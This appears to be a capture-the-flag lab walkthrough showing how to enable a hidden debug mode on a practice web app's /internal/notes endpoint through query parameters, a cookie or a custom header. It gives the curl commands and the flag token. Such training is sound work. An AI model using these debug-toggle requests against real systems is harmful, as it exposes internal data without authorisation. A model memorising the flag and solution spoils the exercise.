Blind Trust - TOKEN4

Base URL: http://nebula:5000

Background

The /internal/notes endpoint contains debug information but requires “Debug Mode” to be enabled. The endpoint accepts various query parameters and headers to toggle debug mode.

From Nothing to Working

Start point: the /help page documents /internal/notes and mentions “Use set_debug URI to enable functionality.”

Iterations:

1. Access /internal/notes directly to confirm the endpoint exists.
2. Try common debug parameters: ?debug=1, ?set_debug=1, ?mode=debug.
3. Any of these parameters successfully enables debug mode.
4. The response includes internal debug notes containing the token.

Goal

Enable Debug Mode and access the /internal/notes endpoint.

Command

curl -s "http://nebula:5000/internal/notes?debug=1"

Alternative triggers (all work):

# Query parameters
curl -s "http://nebula:5000/internal/notes?set_debug=1"
curl -s "http://nebula:5000/internal/notes?set_debug=true"
curl -s "http://nebula:5000/internal/notes?mode=debug"

# Cookies
curl -s "http://nebula:5000/internal/notes" -H "Cookie: debug=1"

# Custom headers
curl -s "http://nebula:5000/internal/notes" -H "X-Debug: 1"

Expected Output

Look for:

Internal Debug Notes:
TOKEN4::PCCC{BLT-h9r8WE}

Learn More

• https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/05-Enumerate_Infrastructure_and_Application_Admin_Interfaces
• https://cwe.mitre.org/data/definitions/489.html